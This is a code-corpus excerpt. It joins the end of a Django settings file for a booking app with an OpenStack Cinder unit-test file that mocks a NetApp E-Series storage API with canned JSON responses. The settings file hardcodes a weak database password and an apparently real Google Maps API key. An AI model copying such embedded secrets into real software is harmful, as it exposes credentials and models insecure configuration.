'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'material.theme.cyan',
'material',
'places',
'object2book',
'booking',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'tobook.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'tobook.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'to-book',
'USER': 'tobook',
'PASSWORD': '123456',
'HOST': '172.17.0.2',
'PORT': '',
}
}
# Email smtp configurations
"""Declare enviroment variables first to set this"""
EMAIL_HOST = os.environ.get('SMTP_HOST')
EMAIL_PORT = os.environ.get('SMTP_PORT')
EMAIL_HOST_USER = os.environ.get('SMTP_HOST_USER')
EMAIL_HOST_PASSWORD = os.environ.get('SMTP_HOST_PASSWD')
FROM_EMAIL = os.environ.get('SMTP_FROM_ADDR')
EMAIL_USE_TLS = True
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
PLACES_MAPS_API_KEY='AIzaSyAVDsYNHfwpeiumJO30Kghw0RjMGwMObT8'
MAP_WIDGET_HEIGHT=480
MAP_OPTIONS={}
MARKER_OPTIONS={}
|
mit
| 3,251,829,976,081,123,000 | 25.202797 | 91 | 0.681879 | false |
e0ne/cinder
|
cinder/tests/test_netapp_eseries_iscsi.py
|
1
|
38027
|
# Copyright (c) 2014 NetApp, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests for NetApp e-series iscsi volume driver.
"""
import json
import re
import mock
import requests
from cinder import exception
from cinder.openstack.common import log as logging
from cinder import test
from cinder.volume import configuration as conf
from cinder.volume.drivers.netapp import common
from cinder.volume.drivers.netapp.options import netapp_basicauth_opts
from cinder.volume.drivers.netapp.options import netapp_eseries_opts
LOG = logging.getLogger(__name__)
def create_configuration():
configuration = conf.Configuration(None)
configuration.append_config_values(netapp_basicauth_opts)
configuration.append_config_values(netapp_eseries_opts)
return configuration
class FakeEseriesResponse(object):
"""Fake response to requests."""
def __init__(self, code=None, text=None):
self.status_code = code
self.text = text
def json(self):
return json.loads(self.text)
class FakeEseriesServerHandler(object):
"""HTTP handler that fakes enough stuff to allow the driver to run."""
def do_GET(self, path, params, data, headers):
"""Respond to a GET request."""
response = FakeEseriesResponse()
if "/devmgr/vn" not in path:
response.status_code = 404
(__, ___, path) = path.partition("/devmgr/vn")
if re.match("^/storage-systems/[0-9a-zA-Z]+/volumes$", path):
response.status_code = 200
response.text = """[{"extremeProtection": false,
"pitBaseVolume": false,
"dssMaxSegmentSize": 131072,
"totalSizeInBytes": "2126008832", "raidLevel": "raid6",
"volumeRef": "0200000060080E500023C73400000AAA52D11677",
"listOfMappings": [], "sectorOffset": "6",
"id": "0200000060080E500023C73400000AAA52D11677",
"wwn": "60080E500023C73400000AAA52D11677",
"capacity": "2126008832", "mgmtClientAttribute": 0,
"label": "repos_0006", "volumeFull": false,
"blkSize": 512, "volumeCopyTarget": false,
"volumeGroupRef":
"0400000060080E500023BB3400001F9F52CECC3F",
"preferredControllerId": "070000000000000000000002",
"currentManager": "070000000000000000000002",
"applicationTagOwned": true, "status": "optimal",
"segmentSize": 131072, "volumeUse":
"freeRepositoryVolume", "action": "none",
"name": "repos_0006", "worldWideName":
"60080E500023C73400000AAA52D11677", "currentControllerId"
: "070000000000000000000002",
"protectionInformationCapable": false, "mapped": false,
"reconPriority": 1, "protectionType": "type0Protection"}
,
{"extremeProtection": false, "pitBaseVolume": true,
"dssMaxSegmentSize": 131072,
"totalSizeInBytes": "2147483648", "raidLevel": "raid6",
"volumeRef": "0200000060080E500023BB3400001FC352D14CB2",
"listOfMappings": [], "sectorOffset": "15",
"id": "0200000060080E500023BB3400001FC352D14CB2",
"wwn": "60080E500023BB3400001FC352D14CB2",
"capacity": "2147483648", "mgmtClientAttribute": 0,
"label": "bdm-vc-test-1", "volumeFull": false,
"blkSize": 512, "volumeCopyTarget": false,
"volumeGroupRef":
"0400000060080E500023BB3400001F9F52CECC3F",
"preferredControllerId": "070000000000000000000001",
"currentManager": "070000000000000000000001",
"applicationTagOwned": false, "status": "optimal",
"segmentSize": 131072, "volumeUse": "standardVolume",
"action": "none", "preferredManager":
"070000000000000000000001", "volumeHandle": 15,
"offline": false, "preReadRedundancyCheckEnabled": false,
"dssPreallocEnabled": false, "name": "bdm-vc-test-1",
"worldWideName": "60080E500023BB3400001FC352D14CB2",
"currentControllerId": "070000000000000000000001",
"protectionInformationCapable": false, "mapped": false,
"reconPriority": 1, "protectionType":
"type1Protection"}]"""
elif re.match("^/storage-systems/[0-9a-zA-Z]+/volumes/[0-9A-Za-z]+$",
path):
response.status_code = 200
response.text = """{"extremeProtection": false,
"pitBaseVolume": true,
"dssMaxSegmentSize": 131072,
"totalSizeInBytes": "2147483648", "raidLevel": "raid6",
"volumeRef": "0200000060080E500023BB3400001FC352D14CB2",
"listOfMappings": [], "sectorOffset": "15",
"id": "0200000060080E500023BB3400001FC352D14CB2",
"wwn": "60080E500023BB3400001FC352D14CB2",
"capacity": "2147483648", "mgmtClientAttribute": 0,
"label": "bdm-vc-test-1", "volumeFull": false,
"blkSize": 512, "volumeCopyTarget": false,
"volumeGroupRef":
"0400000060080E500023BB3400001F9F52CECC3F",
"preferredControllerId": "070000000000000000000001",
"currentManager": "070000000000000000000001",
"applicationTagOwned": false, "status": "optimal",
"segmentSize": 131072, "volumeUse": "standardVolume",
"action": "none", "preferredManager":
"070000000000000000000001", "volumeHandle": 15,
"offline": false, "preReadRedundancyCheckEnabled": false,
"dssPreallocEnabled": false, "name": "bdm-vc-test-1",
"worldWideName": "60080E500023BB3400001FC352D14CB2",
"currentControllerId": "070000000000000000000001",
"protectionInformationCapable": false, "mapped": false,
"reconPriority": 1, "protectionType":
"type1Protection"}"""
elif re.match("^/storage-systems/[0-9a-zA-Z]+/hardware-inventory$",
path):
response.status_code = 200
response.text = """
{"iscsiPorts": [{"controllerId":
"070000000000000000000002", "ipv4Enabled": true,
"ipv4Data": {"ipv4Address":
"0.0.0.0", "ipv4AddressConfigMethod": "configStatic",
"ipv4VlanId": {"isEnabled": false, "value": 0},
"ipv4AddressData": {"ipv4Address": "172.20.123.66",
"ipv4SubnetMask": "255.255.255.0", "configState":
"configured", "ipv4GatewayAddress": "0.0.0.0"}},
"tcpListenPort": 3260,
"interfaceRef": "2202040000000000000000000000000000000000"
,"iqn":
"iqn.1992-01.com.lsi:2365.60080e500023c73400000000515af323"
}]}"""
elif re.match("^/storage-systems/[0-9a-zA-Z]+/hosts$", path):
response.status_code = 200
response.text = """[{"isSAControlled": false,
"confirmLUNMappingCreation"
: false, "label": "stlrx300s7-55", "isLargeBlockFormatHost":
false, "clusterRef": "8500000060080E500023C7340036035F515B78FC",
"protectionInformationCapableAccessMethod": false,
"ports": [], "hostRef":
"8400000060080E500023C73400300381515BFBA3", "hostTypeIndex": 6,
"hostSidePorts": [{"label": "NewStore", "type": "iscsi",
"address": "iqn.1998-01.com.vmware:localhost-28a58148"}]}]"""
elif re.match("^/storage-systems/[0-9a-zA-Z]+/host-types$", path):
response.status_code = 200
response.text = """[{
"id" : "4",
"code" : "AIX",
"name" : "AIX",
"index" : 4
}, {
"id" : "5",
"code" : "IRX",
"name" : "IRX",
"index" : 5
}, {
"id" : "6",
"code" : "LNX",
"name" : "Linux",
"index" : 6
}]"""
elif re.match("^/storage-systems/[0-9a-zA-Z]+/snapshot-groups$", path):
response.status_code = 200
response.text = """[]"""
elif re.match("^/storage-systems/[0-9a-zA-Z]+/snapshot-images$", path):
response.status_code = 200
response.text = """[]"""
elif re.match("^/storage-systems/[0-9a-zA-Z]+/storage-pools$", path):
response.status_code = 200
response.text = """[ {"protectionInformationCapabilities":
{"protectionInformationCapable": true, "protectionType":
"type2Protection"}, "raidLevel": "raidDiskPool", "reserved1":
"000000000000000000000000", "reserved2": "", "isInaccessible":
false, "label": "DDP", "state": "complete", "usage":
"standard", "offline": false, "drawerLossProtection": false,
"trayLossProtection": false, "securityType": "capable",
"volumeGroupRef": "0400000060080E500023BB3400001F9F52CECC3F",
"driveBlockFormat": "__UNDEFINED", "usedSpace": "81604378624",
"volumeGroupData": {"type": "diskPool", "diskPoolData":
{"criticalReconstructPriority": "highest",
"poolUtilizationState": "utilizationOptimal",
"reconstructionReservedDriveCountCurrent": 3, "allocGranularity":
"4294967296", "degradedReconstructPriority": "high",
"backgroundOperationPriority": "low",
"reconstructionReservedAmt": "897111293952", "unusableCapacity":
"0", "reconstructionReservedDriveCount": 1,
"poolUtilizationWarningThreshold": 50,
"poolUtilizationCriticalThreshold": 85}}, "spindleSpeed": 10000,
"worldWideName": "60080E500023BB3400001F9F52CECC3F",
"spindleSpeedMatch": true, "totalRaidedSpace": "17273253317836",
"sequenceNum": 2, "protectionInformationCapable": false}]"""
elif re.match("^/storage-systems$", path):
response.status_code = 200
response.text = """[ {"freePoolSpace": 11142431623168,
"driveCount": 24,
"hostSparesUsed": 0, "id":
"1fa6efb5-f07b-4de4-9f0e-52e5f7ff5d1b",
"hotSpareSizeAsString": "0", "wwn":
"60080E500023C73400000000515AF323", "parameters":
{"minVolSize": 1048576, "maxSnapshotsPerBase": 16,
"maxDrives": 192, "maxVolumes": 512, "maxVolumesPerGroup":
256, "maxMirrors": 0, "maxMappingsPerVolume": 1,
"maxMappableLuns": 256, "maxVolCopys": 511,
"maxSnapshots":
256}, "hotSpareCount": 0, "hostSpareCountInStandby": 0,
"status": "needsattn", "trayCount": 1,
"usedPoolSpaceAsString": "5313000380416",
"ip2": "10.63.165.216", "ip1": "10.63.165.215",
"freePoolSpaceAsString": "11142431623168",
"types": "SAS",
"name": "stle2600-7_8", "hotSpareSize": 0,
"usedPoolSpace":
5313000380416, "driveTypes": ["sas"],
"unconfiguredSpaceByDriveType": {},
"unconfiguredSpaceAsStrings": "0", "model": "2650",
"unconfiguredSpace": 0}]"""
elif re.match("^/storage-systems/[0-9a-zA-Z]+$", path):
response.status_code = 200
response.text = """{"freePoolSpace": 11142431623168,
"driveCount": 24,
"hostSparesUsed": 0, "id":
"1fa6efb5-f07b-4de4-9f0e-52e5f7ff5d1b",
"hotSpareSizeAsString": "0", "wwn":
"60080E500023C73400000000515AF323", "parameters":
{"minVolSize": 1048576, "maxSnapshotsPerBase": 16,
"maxDrives": 192, "maxVolumes": 512, "maxVolumesPerGroup":
256, "maxMirrors": 0, "maxMappingsPerVolume": 1,
"maxMappableLuns": 256, "maxVolCopys": 511,
"maxSnapshots":
256}, "hotSpareCount": 0, "hostSpareCountInStandby": 0,
"status": "needsattn", "trayCount": 1,
"usedPoolSpaceAsString": "5313000380416",
"ip2": "10.63.165.216", "ip1": "10.63.165.215",
"freePoolSpaceAsString": "11142431623168",
"types": "SAS",
"name": "stle2600-7_8", "hotSpareSize": 0,
"usedPoolSpace":
5313000380416, "driveTypes": ["sas"],
"unconfiguredSpaceByDriveType": {},
"unconfiguredSpaceAsStrings": "0", "model": "2650",
"unconfiguredSpace": 0}"""
elif re.match("^/storage-systems/[0-9a-zA-Z]+/volume-copy-jobs"
"/[0-9a-zA-Z]+$", path):
response.status_code = 200
response.text = """{"status": "complete",
"cloneCopy": true, "pgRef":
"3300000060080E500023C73400000ACA52D29454", "volcopyHandle":49160
, "idleTargetWriteProt": true, "copyPriority": "priority2",
"volcopyRef": "1800000060080E500023C73400000ACF52D29466",
"worldWideName": "60080E500023C73400000ACF52D29466",
"copyCompleteTime": "0", "sourceVolume":
"3500000060080E500023C73400000ACE52D29462", "currentManager":
"070000000000000000000002", "copyStartTime": "1389551671",
"reserved1": "00000000", "targetVolume":
"0200000060080E500023C73400000A8C52D10675"}"""
elif re.match("^/storage-systems/[0-9a-zA-Z]+/volume-mappings$", path):
response.status_code = 200
response.text = """[
{
"lunMappingRef":"8800000000000000000000000000000000000000",
"lun": 0,
"ssid": 16384,
"perms": 15,
"volumeRef": "0200000060080E500023BB34000003FB515C2293",
"type": "all",
"mapRef": "8400000060080E500023C73400300381515BFBA3"
}]
"""
else:
# Unknown API
response.status_code = 500
return response
def do_POST(self, path, params, data, headers):
"""Respond to a POST request."""
response = FakeEseriesResponse()
if "/devmgr/vn" not in path:
response.status_code = 404
data = json.loads(data) if data else None
(__, ___, path) = path.partition("/devmgr/vn")
if re.match("^/storage-systems/[0-9a-zA-Z]+/volumes$", path):
response.status_code = 200
text_json = json.loads("""
{"extremeProtection": false, "pitBaseVolume": true,
"dssMaxSegmentSize": 131072,
"totalSizeInBytes": "1073741824", "raidLevel": "raid6",
"volumeRef": "0200000060080E500023BB34000003FB515C2293",
"listOfMappings": [], "sectorOffset": "15",
"id": "0200000060080E500023BB34000003FB515C2293",
"wwn": "60080E500023BB3400001FC352D14CB2",
"capacity": "2147483648", "mgmtClientAttribute": 0,
"label": "CFDXJ67BLJH25DXCZFZD4NSF54",
"volumeFull": false,
"blkSize": 512, "volumeCopyTarget": false,
"volumeGroupRef":
"0400000060080E500023BB3400001F9F52CECC3F",
"preferredControllerId": "070000000000000000000001",
"currentManager": "070000000000000000000001",
"applicationTagOwned": false, "status": "optimal",
"segmentSize": 131072, "volumeUse": "standardVolume",
"action": "none", "preferredManager":
"070000000000000000000001", "volumeHandle": 15,
"offline": false, "preReadRedundancyCheckEnabled": false,
"dssPreallocEnabled": false, "name": "bdm-vc-test-1",
"worldWideName": "60080E500023BB3400001FC352D14CB2",
"currentControllerId": "070000000000000000000001",
"protectionInformationCapable": false, "mapped": false,
"reconPriority": 1, "protectionType":
"type1Protection"}""")
text_json['label'] = data['name']
text_json['name'] = data['name']
text_json['volumeRef'] = data['name']
text_json['id'] = data['name']
response.text = json.dumps(text_json)
elif re.match("^/storage-systems/[0-9a-zA-Z]+/volume-mappings$", path):
response.status_code = 200
text_json = json.loads("""
{
"lunMappingRef":"8800000000000000000000000000000000000000",
"lun": 0,
"ssid": 16384,
"perms": 15,
"volumeRef": "0200000060080E500023BB34000003FB515C2293",
"type": "all",
"mapRef": "8400000060080E500023C73400300381515BFBA3"
}
""")
text_json['volumeRef'] = data['mappableObjectId']
text_json['mapRef'] = data['targetId']
response.text = json.dumps(text_json)
elif re.match("^/storage-systems/[0-9a-zA-Z]+/hosts$", path):
response.status_code = 200
response.text = """{"isSAControlled": false,
"confirmLUNMappingCreation"
: false, "label": "stlrx300s7-55", "isLargeBlockFormatHost":
false, "clusterRef": "8500000060080E500023C7340036035F515B78FC",
"protectionInformationCapableAccessMethod": false,
"ports": [], "hostRef":
"8400000060080E500023C73400300381515BFBA3", "hostTypeIndex": 10,
"hostSidePorts": [{"label": "NewStore", "type": "iscsi",
"address": "iqn.1998-01.com.vmware:localhost-28a58148"}]}"""
elif re.match("^/storage-systems/[0-9a-zA-Z]+/snapshot-groups$", path):
response.status_code = 200
text_json = json.loads("""{"status": "optimal",
"autoDeleteLimit": 0,
"maxRepositoryCapacity": "-65536", "rollbackStatus": "none"
, "unusableRepositoryCapacity": "0", "pitGroupRef":
"3300000060080E500023C7340000098D5294AC9A", "clusterSize":
65536, "label": "C6JICISVHNG2TFZX4XB5ZWL7O",
"maxBaseCapacity":
"476187142128128", "repositoryVolume":
"3600000060080E500023BB3400001FA952CEF12C",
"fullWarnThreshold": 99, "repFullPolicy": "purgepit",
"action": "none", "rollbackPriority": "medium",
"creationPendingStatus": "none", "consistencyGroupRef":
"0000000000000000000000000000000000000000", "volumeHandle":
49153, "consistencyGroup": false, "baseVolume":
"0200000060080E500023C734000009825294A534"}""")
text_json['label'] = data['name']
text_json['name'] = data['name']
text_json['pitGroupRef'] = data['name']
text_json['id'] = data['name']
text_json['baseVolume'] = data['baseMappableObjectId']
response.text = json.dumps(text_json)
elif re.match("^/storage-systems/[0-9a-zA-Z]+/snapshot-images$", path):
response.status_code = 200
text_json = json.loads("""{"status": "optimal",
"pitCapacity": "2147483648",
"pitTimestamp": "1389315375", "pitGroupRef":
"3300000060080E500023C7340000098D5294AC9A", "creationMethod":
"user", "repositoryCapacityUtilization": "2818048",
"activeCOW": true, "isRollbackSource": false, "pitRef":
"3400000060080E500023BB3400631F335294A5A8",
"pitSequenceNumber": "19"}""")
text_json['label'] = data['groupId']
text_json['name'] = data['groupId']
text_json['id'] = data['groupId']
text_json['pitGroupRef'] = data['groupId']
response.text = json.dumps(text_json)
elif re.match("^/storage-systems/[0-9a-zA-Z]+/snapshot-volumes$",
path):
response.status_code = 200
text_json = json.loads("""{"unusableRepositoryCapacity": "0",
"totalSizeInBytes":
"-1", "worldWideName": "60080E500023BB3400001FAD52CEF2F5",
"boundToPIT": true, "wwn":
"60080E500023BB3400001FAD52CEF2F5", "id":
"3500000060080E500023BB3400001FAD52CEF2F5",
"baseVol": "0200000060080E500023BB3400001FA352CECCAE",
"label": "bdm-pv-1", "volumeFull": false,
"preferredControllerId": "070000000000000000000001", "offline":
false, "viewSequenceNumber": "10", "status": "optimal",
"viewRef": "3500000060080E500023BB3400001FAD52CEF2F5",
"mapped": false, "accessMode": "readOnly", "viewTime":
"1389315613", "repositoryVolume":
"0000000000000000000000000000000000000000", "preferredManager":
"070000000000000000000001", "volumeHandle": 16385,
"currentManager": "070000000000000000000001",
"maxRepositoryCapacity": "0", "name": "bdm-pv-1",
"fullWarnThreshold": 0, "currentControllerId":
"070000000000000000000001", "basePIT":
"3400000060080E500023BB3400631F335294A5A8", "clusterSize":
0, "mgmtClientAttribute": 0}""")
text_json['label'] = data['name']
text_json['name'] = data['name']
text_json['id'] = data['name']
text_json['basePIT'] = data['snapshotImageId']
text_json['baseVol'] = data['baseMappableObjectId']
response.text = json.dumps(text_json)
elif re.match("^/storage-systems$", path):
response.status_code = 200
response.text = """{"freePoolSpace": "17055871480319",
"driveCount": 24,
"wwn": "60080E500023C73400000000515AF323", "id": "1",
"hotSpareSizeAsString": "0", "hostSparesUsed": 0, "types": "",
"hostSpareCountInStandby": 0, "status": "optimal", "trayCount":
1, "usedPoolSpaceAsString": "37452115456", "ip2":
"10.63.165.216", "ip1": "10.63.165.215",
"freePoolSpaceAsString": "17055871480319", "hotSpareCount": 0,
"hotSpareSize": "0", "name": "stle2600-7_8", "usedPoolSpace":
"37452115456", "driveTypes": ["sas"],
"unconfiguredSpaceByDriveType": {}, "unconfiguredSpaceAsStrings":
"0", "model": "2650", "unconfiguredSpace": "0"}"""
elif re.match("^/storage-systems/[0-9a-zA-Z]+$",
path):
response.status_code = 200
elif re.match("^/storage-systems/[0-9a-zA-Z]+/volume-copy-jobs$",
path):
response.status_code = 200
response.text = """{"status": "complete", "cloneCopy": true,
"pgRef":
"3300000060080E500023C73400000ACA52D29454", "volcopyHandle":49160
, "idleTargetWriteProt": true, "copyPriority": "priority2",
"volcopyRef": "1800000060080E500023C73400000ACF52D29466",
"worldWideName": "60080E500023C73400000ACF52D29466",
"copyCompleteTime": "0", "sourceVolume":
"3500000060080E500023C73400000ACE52D29462", "currentManager":
"070000000000000000000002", "copyStartTime": "1389551671",
"reserved1": "00000000", "targetVolume":
"0200000060080E500023C73400000A8C52D10675"}"""
elif re.match("^/storage-systems/[0-9a-zA-Z]+/volumes/[0-9A-Za-z]+$",
path):
response.status_code = 200
response.text = """{"extremeProtection": false,
"pitBaseVolume": true,
"dssMaxSegmentSize": 131072,
"totalSizeInBytes": "1073741824", "raidLevel": "raid6",
"volumeRef": "0200000060080E500023BB34000003FB515C2293",
"listOfMappings": [], "sectorOffset": "15",
"id": "0200000060080E500023BB34000003FB515C2293",
"wwn": "60080E500023BB3400001FC352D14CB2",
"capacity": "2147483648", "mgmtClientAttribute": 0,
"label": "rename",
"volumeFull": false,
"blkSize": 512, "volumeCopyTarget": false,
"volumeGroupRef":
"0400000060080E500023BB3400001F9F52CECC3F",
"preferredControllerId": "070000000000000000000001",
"currentManager": "070000000000000000000001",
"applicationTagOwned": false, "status": "optimal",
"segmentSize": 131072, "volumeUse": "standardVolume",
"action": "none", "preferredManager":
"070000000000000000000001", "volumeHandle": 15,
"offline": false, "preReadRedundancyCheckEnabled": false,
"dssPreallocEnabled": false, "name": "bdm-vc-test-1",
"worldWideName": "60080E500023BB3400001FC352D14CB2",
"currentControllerId": "070000000000000000000001",
"protectionInformationCapable": false, "mapped": false,
"reconPriority": 1, "protectionType":
"type1Protection"}"""
else:
# Unknown API
response.status_code = 500
return response
def do_DELETE(self, path, params, data, headers):
"""Respond to a DELETE request."""
response = FakeEseriesResponse()
if "/devmgr/vn" not in path:
response.status_code = 500
(__, ___, path) = path.partition("/devmgr/vn")
if re.match("^/storage-systems/[0-9a-zA-Z]+/snapshot-images"
"/[0-9A-Za-z]+$", path):
code = 204
elif re.match("^/storage-systems/[0-9a-zA-Z]+/snapshot-groups"
"/[0-9A-Za-z]+$", path):
code = 204
elif re.match("^/storage-systems/[0-9a-zA-Z]+/snapshot-volumes"
"/[0-9A-Za-z]+$", path):
code = 204
elif re.match("^/storage-systems/[0-9a-zA-Z]+/volume-copy-jobs"
"/[0-9A-Za-z]+$", path):
code = 204
elif re.match("^/storage-systems/[0-9a-zA-Z]+/volumes"
"/[0-9A-Za-z]+$", path):
code = 204
elif re.match("^/storage-systems/[0-9a-zA-Z]+/volume-mappings/"
"[0-9a-zA-Z]+$", path):
code = 204
else:
code = 500
response.status_code = code
return response
class FakeEseriesHTTPSession(object):
"""A fake requests.Session for netapp tests.
"""
def __init__(self):
self.handler = FakeEseriesServerHandler()
def request(self, method, url, params, data, headers, timeout, verify):
address = '127.0.0.1:80'
(__, ___, path) = url.partition(address)
if method.upper() == 'GET':
return self.handler.do_GET(path, params, data, headers)
elif method.upper() == 'POST':
return self.handler.do_POST(path, params, data, headers)
elif method.upper() == 'DELETE':
return self.handler.do_DELETE(path, params, data, headers)
else:
raise exception.Invalid()
class NetAppEseriesIscsiDriverTestCase(test.TestCase):
"""Test case for NetApp e-series iscsi driver."""
volume = {'id': '114774fb-e15a-4fae-8ee2-c9723e3645ef', 'size': 1,
'volume_name': 'lun1',
'os_type': 'linux', 'provider_location': 'lun1',
'id': '114774fb-e15a-4fae-8ee2-c9723e3645ef',
'provider_auth': 'provider a b', 'project_id': 'project',
'display_name': None, 'display_description': 'lun1',
'volume_type_id': None}
snapshot = {'id': '17928122-553b-4da9-9737-e5c3dcd97f75',
'volume_id': '114774fb-e15a-4fae-8ee2-c9723e3645ef',
'size': 2, 'volume_name': 'lun1',
'volume_size': 2, 'project_id': 'project',
'display_name': None, 'display_description': 'lun1',
'volume_type_id': None}
volume_sec = {'id': 'b6c01641-8955-4917-a5e3-077147478575',
'size': 2, 'volume_name': 'lun1',
'os_type': 'linux', 'provider_location': 'lun1',
'id': 'b6c01641-8955-4917-a5e3-077147478575',
'provider_auth': None, 'project_id': 'project',
'display_name': None, 'display_description': 'lun1',
'volume_type_id': None}
volume_clone = {'id': 'b4b24b27-c716-4647-b66d-8b93ead770a5', 'size': 3,
'volume_name': 'lun1',
'os_type': 'linux', 'provider_location': 'cl_sm',
'id': 'b4b24b27-c716-4647-b66d-8b93ead770a5',
'provider_auth': None,
'project_id': 'project', 'display_name': None,
'display_description': 'lun1',
'volume_type_id': None}
volume_clone_large = {'id': 'f6ef5bf5-e24f-4cbb-b4c4-11d631d6e553',
'size': 6, 'volume_name': 'lun1',
'os_type': 'linux', 'provider_location': 'cl_lg',
'id': 'f6ef5bf5-e24f-4cbb-b4c4-11d631d6e553',
'provider_auth': None,
'project_id': 'project', 'display_name': None,
'display_description': 'lun1',
'volume_type_id': None}
connector = {'initiator': 'iqn.1998-01.com.vmware:localhost-28a58148'}
def setUp(self):
super(NetAppEseriesIscsiDriverTestCase, self).setUp()
self._custom_setup()
def _custom_setup(self):
configuration = self._set_config(create_configuration())
self.driver = common.NetAppDriver(configuration=configuration)
requests.Session = mock.Mock(wraps=FakeEseriesHTTPSession)
self.driver.do_setup(context='context')
self.driver.check_for_setup_error()
def _set_config(self, configuration):
configuration.netapp_storage_family = 'eseries'
configuration.netapp_storage_protocol = 'iscsi'
configuration.netapp_transport_type = 'http'
configuration.netapp_server_hostname = '127.0.0.1'
configuration.netapp_server_port = '80'
configuration.netapp_webservice_path = '/devmgr/vn'
configuration.netapp_controller_ips = '127.0.0.2,127.0.0.3'
configuration.netapp_sa_password = 'pass1234'
configuration.netapp_login = 'rw'
configuration.netapp_password = 'rw'
configuration.netapp_storage_pools = 'DDP'
return configuration
def test_embedded_mode(self):
configuration = self._set_config(create_configuration())
configuration.netapp_controller_ips = '127.0.0.1,127.0.0.3'
driver = common.NetAppDriver(configuration=configuration)
driver.do_setup(context='context')
self.assertEqual(driver._client.get_system_id(),
'1fa6efb5-f07b-4de4-9f0e-52e5f7ff5d1b')
def test_check_system_pwd_not_sync(self):
def list_system():
if getattr(self, 'test_count', None):
self.test_count = 1
return {'status': 'passwordoutofsync'}
return {'status': 'needsAttention'}
self.driver._client.list_storage_system = mock.Mock(wraps=list_system)
result = self.driver._check_storage_system()
self.assertTrue(result)
def test_connect(self):
self.driver.check_for_setup_error()
def test_create_destroy(self):
self.driver.create_volume(self.volume)
self.driver.delete_volume(self.volume)
def test_create_vol_snapshot_destroy(self):
self.driver.create_volume(self.volume)
self.driver.create_snapshot(self.snapshot)
self.driver.create_volume_from_snapshot(self.volume_sec, self.snapshot)
self.driver.delete_snapshot(self.snapshot)
self.driver.delete_volume(self.volume)
def test_map_unmap(self):
self.driver.create_volume(self.volume)
connection_info = self.driver.initialize_connection(self.volume,
self.connector)
self.assertEqual(connection_info['driver_volume_type'], 'iscsi')
properties = connection_info.get('data')
self.assertIsNotNone(properties, 'Target portal is none')
self.driver.terminate_connection(self.volume, self.connector)
self.driver.delete_volume(self.volume)
def test_map_already_mapped_same_host(self):
self.driver.create_volume(self.volume)
maps = [{'lunMappingRef': 'hdkjsdhjsdh',
'mapRef': '8400000060080E500023C73400300381515BFBA3',
'volumeRef': 'CFDXJ67BLJH25DXCZFZD4NSF54',
'lun': 2}]
self.driver._get_host_mapping_for_vol_frm_array = mock.Mock(
return_value=maps)
self.driver._get_free_lun = mock.Mock()
info = self.driver.initialize_connection(self.volume, self.connector)
self.assertEqual(
self.driver._get_host_mapping_for_vol_frm_array.call_count, 1)
self.assertEqual(self.driver._get_free_lun.call_count, 0)
self.assertEqual(info['driver_volume_type'], 'iscsi')
properties = info.get('data')
self.assertIsNotNone(properties, 'Target portal is none')
self.driver.terminate_connection(self.volume, self.connector)
self.driver.delete_volume(self.volume)
def test_map_already_mapped_diff_host(self):
self.driver.create_volume(self.volume)
maps = [{'lunMappingRef': 'hdkjsdhjsdh',
'mapRef': '7400000060080E500023C73400300381515BFBA3',
'volumeRef': 'CFDXJ67BLJH25DXCZFZD4NSF54',
'lun': 2}]
self.driver._get_host_mapping_for_vol_frm_array = mock.Mock(
return_value=maps)
self.driver._get_vol_mapping_for_host_frm_array = mock.Mock(
return_value=[])
self.driver._get_free_lun = mock.Mock(return_value=0)
self.driver._del_vol_mapping_frm_cache = mock.Mock()
info = self.driver.initialize_connection(self.volume, self.connector)
self.assertEqual(
self.driver._get_vol_mapping_for_host_frm_array.call_count, 1)
self.assertEqual(
self.driver._get_host_mapping_for_vol_frm_array.call_count, 1)
self.assertEqual(self.driver._get_free_lun.call_count, 1)
self.assertEqual(self.driver._del_vol_mapping_frm_cache.call_count, 1)
self.assertEqual(info['driver_volume_type'], 'iscsi')
properties = info.get('data')
self.assertIsNotNone(properties, 'Target portal is none')
self.driver.terminate_connection(self.volume, self.connector)
self.driver.delete_volume(self.volume)
def test_cloned_volume_destroy(self):
self.driver.create_volume(self.volume)
self.driver.create_cloned_volume(self.snapshot, self.volume)
self.driver.delete_volume(self.volume)
def test_map_by_creating_host(self):
self.driver.create_volume(self.volume)
connector_new = {'initiator': 'iqn.1993-08.org.debian:01:1001'}
connection_info = self.driver.initialize_connection(self.volume,
connector_new)
self.assertEqual(connection_info['driver_volume_type'], 'iscsi')
properties = connection_info.get('data')
self.assertIsNotNone(properties, 'Target portal is none')
def test_vol_stats(self):
self.driver.get_volume_stats(refresh=True)
